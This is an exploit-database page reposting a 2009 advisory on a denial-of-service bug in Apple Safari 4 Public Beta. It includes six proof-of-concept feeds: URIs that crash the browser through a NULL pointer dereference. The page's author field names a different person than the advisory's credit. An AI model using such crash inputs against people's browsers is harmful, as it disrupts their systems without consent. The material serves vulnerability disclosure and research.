Advertisement






Apple Safari 4 Beta feeds: URI NULL Pointer Dereference Denial of Service Vulnerability

CVE Category Price Severity
CVE-2009-4192 CWE-399 Not specified High
Author Risk Exploitation Type Date
Michal Zalewski High Remote 2009-03-05
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009030092

Below is a copy:

Apple Safari 4 Beta feeds: URI NULL Pointer Dereference Denial of
Service Vulnerability

Date:    Feb 25 2009
Class:    Input Validation Error
Local:    Yes
Remote:    Yes
Vulnerable Versions:
    * Apple Safari 4 (528.16) Public Beta

Note: MacOS X versions not tested.

Description:
Apple Safari is prone to a denial-of-service vulnerability, caused by a
NULL pointer defernce bug, because it fails to adequately sanitize
user-supplied input within afeeds: URI.
Attackers can exploit this issue to cause denial-of-service conditions
on a users computer and crash the Safari process.

Proof-of-Concept:
feeds:%&www.rec-sec.com/feed/
feeds:{&www.rec-sec.com/feed/
feeds:}&www.rec-sec.com/feed/
feeds:^&www.rec-sec.com/feed/
feeds:`&www.rec-sec.com/feed/
feeds:|&www.rec-sec.com/feed/

Any feeds: URI containing one of these characters will cause a
denial-of-service condition.

Disclosure:
Vendor has been informed.

Solution:
No solution.

Credit:
Trancer
http://www.rec-sec.com

-- 
Trancer
0nly Human.



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum